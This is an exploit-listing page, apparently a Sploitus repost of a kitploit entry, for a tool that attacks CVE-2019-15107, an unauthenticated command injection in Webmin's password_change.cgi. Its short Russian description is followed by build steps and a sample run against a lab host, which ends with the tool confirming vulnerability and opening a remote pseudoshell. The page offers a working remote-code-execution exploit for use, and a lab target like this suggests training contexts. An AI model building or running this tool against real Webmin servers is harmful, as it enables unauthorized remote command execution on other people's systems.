Sploitus

Exploit for CVE-2019-15107

kitploit · 2026-08-31

Exploit Code

MARKDOWN42 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WHOKILLEDDB-CVE-2019-15107
# CVE-2019-15107 Webmin Эксплойт

![](https://img.shields.io/badge/License-GPL%20v2-blue.svg) ![](https://img.shields.io/badge/Made%20With-C-green.svg)

## CVE-2019-15107

Проблема была обнаружена в **Webmin <=1.920**. Параметр `old` в `password_change.cgi` содержит уязвимость внедрения команд. [NVD]

## Сборка

root@kitploit:~
    
    
    $ git clone https://github.com/whokilleddb/CVE-2019-15107
    $ cd CVE-2019-15107
    $ make
    

## Пример использования

root@kitploit:~
    
    
    $ ./exploit http://thomaswreath.thm:10000
    [+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
    [+] Target URI: http://thomaswreath.thm:10000
    
    ======Headers======
    HTTP/1.0 200 Document follows
    Server: MiniServ/1.890
    Date: Sat, 14 Aug 2021 23:40:01 GMT
    Content-type: text/html; Charset=iso-8859-1
    Connection: close
    
    [~] The Given Server Is Running In SSL MODE
    [+] Switching To SSL
    [+] The Given Server Might Be Vulnerable To CVE-2019-15107
    [+] The Given Server IS VULNERABLE To CVE-2019-15107
    [+] Starting Pseudoshell
    [+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
    [+] To Exit, type: exit()